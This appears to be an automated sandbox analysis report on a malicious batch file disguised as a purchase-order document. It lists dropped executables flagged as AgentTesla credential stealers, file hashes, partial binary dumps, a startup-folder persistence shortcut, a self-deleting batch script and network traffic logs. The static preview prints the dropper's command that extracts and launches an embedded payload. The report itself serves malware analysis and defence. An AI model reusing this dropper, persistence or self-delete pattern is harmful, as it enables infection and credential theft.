SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\neworigin.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	250368
Entropy (8bit):	5.008874766930935
Encrypted:	false
SSDEEP:	3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
MD5:	D6A4CF0966D24C1EA836BA9A899751E5
SHA1:	392D68C000137B8039155DF6BB331D643909E7E7
SHA-256:	DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
SHA-512:	9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.\|........................................

C:\Users\user\AppData\Local\Temp\server_BTC.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.036890143780922
Encrypted:	false
SSDEEP:	3:mKDDCMNvFbuov3DMERE2J5xAIJWAdEFKDwU1hGDMERE2J5xAInTRIJvO+BQty:hWKdbuoLFi23fJWAawDNeFi23fTI
MD5:	56757CD24E4B383D9E74CFEA2267724E
SHA1:	FE98E3B69687E714DD1708D3C313078A7283E37E
SHA-256:	4796F07C1E14015E91E10451052CFD62AA37303B37A47EA0C1991C5594F364D8
SHA-512:	3936DB6CE99B34C3A65EE0F64BABD0F91ACE56FFF496964F9E1EB70852E9AA60FEFF3008AEB087E40C22B731822A96488A1AFC251FEB42FEF78ADA7B16F604CE
Malicious:	false
Preview:	@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpFF65.tmp.cmd" /f /q..

C:\Users\user\AppData\Local\Temp\x.exe

Download File

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1392640
Entropy (8bit):	7.401846851033825
Encrypted:	false
SSDEEP:	24576:in5YMTKJPtU65L4oU78G6Hd8b2s17EeL4fFyV2vkSotd/ADgKczxj5z:wzGSkfQJSgK
MD5:	67DAC6AE9EE770115DB85CC71979DC41
SHA1:	A708539EBB312329F56F064A8491E4C6E1BD7CE8
SHA-256:	054899796D592BB5F70B0A9FA28429024A919270A76603626BE24068FAAE59D9
SHA-512:	9FF88C70D4A2F7628A2F853D576B8E7D7EBF3409DE13D56895A06EB2FDC827BEEF45EC982DBC69A9577ED78D27D44F5DF2284CDF614BA4DEBADAF74CD07C204D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........x............@..............................................@...............................'...P...........................r..................................................h...<............................text....Z.......\.................. ..`.itext..L....p.......`.............. ..`.data...............j..............@....bss.....6...@....... ...................idata...'.......(... ..............@....tls....4............H...................rdata...............H..............@..@.reloc...r.......t...J..............@..B.rsrc........P......................@..@.....................@..............@..@................................................................................................

C:\Users\user\AppData\Roaming\74b31e1c42af9477.bin

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.986212823428834
Encrypted:	false
SSDEEP:	384:9YA8pnbt1Q3xMP2jV3n7ScR4eqUAWS9PPxc:9YDtiyPcrbRz2xPq
MD5:	CF0E5F832B81A1EECF0CBD52FB761470
SHA1:	381771F658BC169A5D5A70AD6ED744763F2A8A20
SHA-256:	96A73FA0DA103FAA180E95C7C57100B8E784D26916FE8800946E5AB5145325B1
SHA-512:	FF25D2B6CEF2E5E404773D0F9BDC08E53A55D9743394264CFAEBF0C422698C06D11A1F02D365D3BF721204D31B5CDECC255DA91ACA2A4ED5065F6BE852681E14
Malicious:	false
Preview:	.......PNN._Q........~.o........0t....\t.A.v..B...L2..F..Yy-``.NI..x.L.b.A.]l..$....cn4...a6.;.y....`g.f.g.;.;.......]&`.<V.\j.\|..[.....j..gf...........3.[}.....U.}....7x.&h.1.P..V..X.&..h...9..G.....&i......{sUB....r.....2..DI..#$T..S"=y..}C.B+.MsZ@t...N".....p..>.n.......X...........T.c.....@i......O./h6.PG.R5..........:...]..b......'..]....... .l:,/}..G.k@vX......t....t..P.K.._l..[.Q$.9.-.^..W>.<.......x$=.....~.Uu8P...m..bE*=.Y.j6n.u$...LJ..EY.^]CT.}.O..%.D._.c1.M....Y....o?3..[J....%.a:......_......1.?U. .......ei..Y?@d.h.xt.B&.2...W..-.....R.<..X"4.AM..~...............B..X.].B.\|.I..3...:.p..6z.=.R.m. {r..,.._]=t.7.+`+R...._....n\|...\|....Tq..o+%+)J....J.:./.......(.8......A[.y.6E..o.D.Nz...~.h.......Hx..',k..\|.>zp?\..q..~....j.i9V..b...m.5h....-....'7..A.... .J..T....'..b3KH..../....n.....?.~.D........L../Ud4._...`XMp/..Sk..A.!....d.A+.1&...nstC.......]Ie.....?.Mf.;W..d$.=....X.U.l.q..8j.OOyi+....n3p...O..c.@...3.z....j1T.N....

C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Nov 21 15:00:25 2024, mtime=Thu Nov 21 15:00:25 2024, atime=Thu Nov 21 15:00:23 2024, length=231936, window=
Category:	dropped
Size (bytes):	1788
Entropy (8bit):	3.524958153788847
Encrypted:	false
SSDEEP:	24:8rgHzgbSVI/WILSFt2wLbMA0s4FSnylwO4ZTqlSxBscm:8rgHMoIWILSewLbLx4+ylwZTqlSrsc
MD5:	048E561D5EE805688C117B50FF1EBCFF
SHA1:	4264A13A366A26F7EA5CE9BAA1E7F9C1CEAAE4AC
SHA-256:	AF582B2A54C9C0A96CC9FA505BC2450B23DD8E9B9ACADA9ADAE90D0D28E9132D
SHA-512:	B2ABD215430FD61E1C201D250CDC871D62AD1D82492D3866C533DE89BE6AD046EA31D633F7C4BFC115C370B06EEF1F5B5ECE5B3AF2540A4D1EF2777A8C247CFC
Malicious:	false
Preview:	L..................F.@.. ...._.z.<...z.<..Xk.y.<............................:..DG..Yr?.D..U..k0.&...&.........5q......l.<...z.<......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)NuY.............................c..A.p.p.D.a.t.a...B.V.1.....uY....Roaming.@......EW)NuY.............................5..R.o.a.m.i.n.g.....T.1.....uY....ACCApi..>......uY..uY...............................A.C.C.A.p.i.....l.2.....uY.. .TROJAN~1.EXE..P......uY..uY.............................C.T.r.o.j.a.n.A.I.b.o.t...e.x.e.......c...............-.......b..............t.....C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e./.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe..................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	591
Entropy (8bit):	4.634489914013821
Encrypted:	false
SSDEEP:	12:qaZ/xTzP1eSbZ7u0wxDDDDDDDDjCaY5eUaYAQUTB8NGNn+:B/xTzdp7u0wQakJaBt8NN
MD5:	E85C6CC551B03AB5AF64DA333B31E7C9
SHA1:	E0157A3D2D6841D66D3C1BBCDBB87C32C0AFD9CF
SHA-256:	BC0D47450D402DAF0FEFACA8170EA04323021272C35D4A52D83ECA72F6434624
SHA-512:	AE9248D83D0D753AE156E8862F3EECE335EC5E7587552EB928DB05EAEEA2630296B1BF9A66CCBB4B5E21C42615F421CCB0E7F68E934466F5392003067FFFA186
Malicious:	false
Preview:	..Initiating COPY FILE mode..... Source File: C:\Users\user\AppData\Local\Temp\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Wisrysxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... \|----\|----\|----\|----\|----\|----\|----\|----\|----\|----\|... ..........................................................Total bytes read = 0x154000 (1392640) (1 MB)....Total bytes written = 0x154000 (1392640) (1 MB).......Operation completed successfully in 0.390 seconds.....

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	66
Entropy (8bit):	4.524640141725149
Encrypted:	false
SSDEEP:	3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
MD5:	04A92849F3C0EE6AC36734C600767EFA
SHA1:	C77B1FF27BC49AB80202109B35C38EE3548429BD
SHA-256:	28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
SHA-512:	6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
Malicious:	false
Preview:	..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

Static File Info

General

File type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 43 datablocks, 0 compression
Entropy (8bit):	7.401349657402711
TrID:	Microsoft Cabinet Archive (8008/1) 99.91% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
File name:	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat
File size:	1'393'123 bytes
MD5:	ae6a8a43561ba85215f8b9986001a520
SHA1:	08d50775b58ae5f13b971a674e7799477a5bd00c
SHA256:	a0b4998d451f008fd7f752ef86b9a7306684f9193f07db1986273727636da61e
SHA512:	fee4e837fc1848addf0bc5431d8df3807f74dede3c685913a18ce193fb5ad6cf9090448ac024890e4dbe7b3eec19b076fde5559079b366238e73108103878f5f
SSDEEP:	24576:An9YMTuJTJU65LUoUf8G6HxQ/2sB7oeLQzFyt27kycNFDUDMeYf1f53:WzuS8zA1mMe
TLSH:	4E558D3AD2418F35DB3A25394D4A72ACC758DD741823674F12B0B8D6AB341BB9F5C28E
File Content Preview:	MSCF............u.......................+.......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".....@............ .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-21T17:00:13.455183+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49713	198.252.105.91	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 17:00:11.985930920 CET	49712	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:11.985985994 CET	443	49712	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:11.986154079 CET	49712	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:11.986387014 CET	49712	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:11.986474037 CET	443	49712	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:11.986958027 CET	49712	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:12.049181938 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:12.049228907 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:12.049348116 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:12.050584078 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:12.050599098 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:13.455077887 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:13.455183029 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:13.534975052 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:13.535006046 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:13.536035061 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:13.589344025 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:13.762641907 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:13.803339005 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.136476040 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.181375027 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.181404114 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.229351044 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.256222963 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.256258011 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.256293058 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.256330013 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.256336927 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.256359100 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.256390095 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.256402016 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.256416082 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.301014900 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.388977051 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.388998032 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.389022112 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.389033079 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.389060020 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.389065981 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.389080048 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.389107943 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.389132023 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.444894075 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.444905043 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.444946051 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.444966078 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.444991112 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.445060015 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.445060015 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.584496021 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.584517956 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.584657907 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.584686995 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.584764004 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.618729115 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.618748903 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.618850946 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.618864059 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.618910074 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.648190975 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.648209095 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.648286104 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.648294926 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.648333073 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.776562929 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.776587009 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.776705027 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.776737928 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.776777983 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.800520897 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.800542116 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.800724983 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.800769091 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.800847054 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.820633888 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.820667982 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.820784092 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.820804119 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.820851088 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.843709946 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.843741894 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.843869925 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.843882084 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.843924046 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.867053986 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.867089033 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.867172956 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.867191076 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.867207050 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.867244005 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.886873007 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.886903048 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.887010098 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.887042999 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.887063026 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.887077093 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.910126925 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.910151005 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.910257101 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.910295963 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.910311937 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.910339117 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.991102934 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.991166115 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.991183996 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.991225004 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:14.991241932 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:14.991270065 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.004909992 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.004945040 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.004981995 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.004995108 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.005023956 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.005033970 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.019948006 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.019973993 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.020026922 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.020040989 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.020067930 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.020090103 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.020097971 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.028647900 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.028672934 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.028738022 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.028753996 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.028779030 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.036278009 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.036307096 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.036360025 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.036384106 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.036405087 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.044368029 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.044390917 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.044456005 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.044467926 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.044492960 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.052611113 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.052633047 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.052690983 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.052701950 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.052714109 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.059793949 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.059818029 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.059858084 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.059871912 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.059890032 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.109384060 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.194859028 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.194886923 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.194972992 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.194994926 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.195013046 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.195039034 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.202709913 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.202730894 CET	443	49713	198.252.105.91	192.168.2.10
